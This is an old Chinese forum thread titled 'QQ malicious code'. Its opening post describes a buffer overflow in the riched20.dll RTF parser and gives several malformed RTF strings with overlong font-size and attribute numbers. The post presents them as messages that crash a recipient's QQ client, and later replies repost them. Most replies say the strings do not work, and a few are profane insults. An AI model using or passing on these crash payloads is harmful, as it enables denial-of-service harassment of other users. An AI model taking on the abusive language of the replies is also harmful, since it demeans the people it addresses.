大可论坛吧 关注:2贴子:460
  • 14回复贴,共1

qq恶意代码

只看楼主收藏回复

QQ恶意代码

Riched20.DLL 属性标示缓冲区溢出漏洞 


受影响系统: Microsoft Windows 98 
Microsoft Windows 2000 
Microsoft Windows XP 
该漏洞可能还存在于其它操作系统中,未测试 


漏洞描述: 
riched20.dll中存在一个缓冲区溢出漏洞,该漏洞可导致使用此DLL模块相应功能的应用程序崩溃,但其很难被用来执行任意代码。 

问题出现在其对RTF文档分析的代码中,其对文档中属性标示中的数字(如字体大小)等处理不当,使其出现溢出。 
此溢出似乎不能导致执行任意代码。 
下面一段RTF文档可能导致非法操作: 
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;] 
{\colortbl ;\red255\green0\blue255;} 
\viewkind4\uc1\pard\cf1\kerning2\f0\fs18121111111111111111111111111111111110000
www.yoursft.com\fs20\par } 
其中 \fs 是用来设置后面的文字 byebye 的字体大小的,当字体大小数字串长度超过32字节时,就会引发缓冲区溢出,当超过34字节以后就有可能会导致应用程序崩溃。 

不但是\fs的设置中会出现这个问题,其他属性标示中的类似情况下也会出现同样的问题,例如下面一段RTL文档,同样会导致非法操作: 
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;] 
{\colortbl ;\red255\green0\blue255;} 
\viewkind4\uc1\pard\cf1\kerning2\f0121111111111111111111111111111111112222\
fs180www.yoursft.com\fs20\par } 

更为可怕的是,目前很多软件包括国内最流行的既时通讯软件QQ(QQ2000c 0825 版本以后)都会受此漏洞影响,对方可以给你发送一个包含利用漏洞的 
攻击消息,那你的QQ在查看对方的消息时会立即崩溃。
对抗补丁(下载后覆盖原文件就可以) QQ保护大师下载
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\
fcharset134'cb'ce'cc'e5;}}\fs1800000000000000000000000000000
此段代码在WINME系统中和装上新的QQ软件后就不再掉了!

{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\fcharset2 'cb'ce'cc'e5;}} 
\fs4000红心部落
这段代码是发大字,QQ字体的最大值22号,但用了这段代码后4000为字号,就可以发大字了。其中字体的代码可自己设置。大家可以对话模式中试试,或群中发。



1楼2004-03-14 23:24回复
    • 218.62.75.*
    ({\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\fcharset134 'cb'ce'cc'e5;}} \fs1800000000000000000000000000000)


    2楼2005-11-12 01:20
    回复
      • 222.47.124.*
      操```什么JB``那能


      3楼2006-03-23 20:05
      回复
        • 218.15.128.*
        垃圾~~骗人~


        4楼2007-04-22 14:25
        回复
          • 125.106.169.*
          没用的!


          6楼2007-11-17 14:36
          回复
            • 222.82.249.*
            laji


            7楼2007-12-20 13:06
            回复
              • 222.56.153.*
              没有效果啊.


              8楼2008-01-03 14:55
              回复
                • 218.56.184.*
                什么东西啊 糊弄


                9楼2008-03-09 13:38
                回复
                  • 58.44.113.*
                  死杂种
                   浪费老子表情


                  10楼2008-06-16 13:11
                  回复
                    • 125.58.192.*
                    不好使啊


                    11楼2008-07-27 23:07
                    回复
                      • 218.89.50.*
                      滚 劳资⒉儿石 假MP 
                       小心劳资阿看老迩 
                       杂毛
                       烂仗


                      12楼2009-04-12 10:28
                      回复
                        • 219.141.80.*
                        到底有没有哦!是不是骗人了。


                        13楼2009-06-13 15:29
                        回复
                          • 218.63.213.*
                          先生请问要怎么用呀!我有点不懂哦
                          请教 请教   哦谢谢


                          14楼2009-07-21 10:50
                          回复
                            • 61.178.172.*
                            说明怎么用啊。


                            15楼2010-05-27 08:12
                            回复
                              {\urtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\fprq2\fcharset134 'cb'ce'cc'e5;}}
                              \fs1800000000000000000000000000000


                              16楼2012-08-16 23:12
                              回复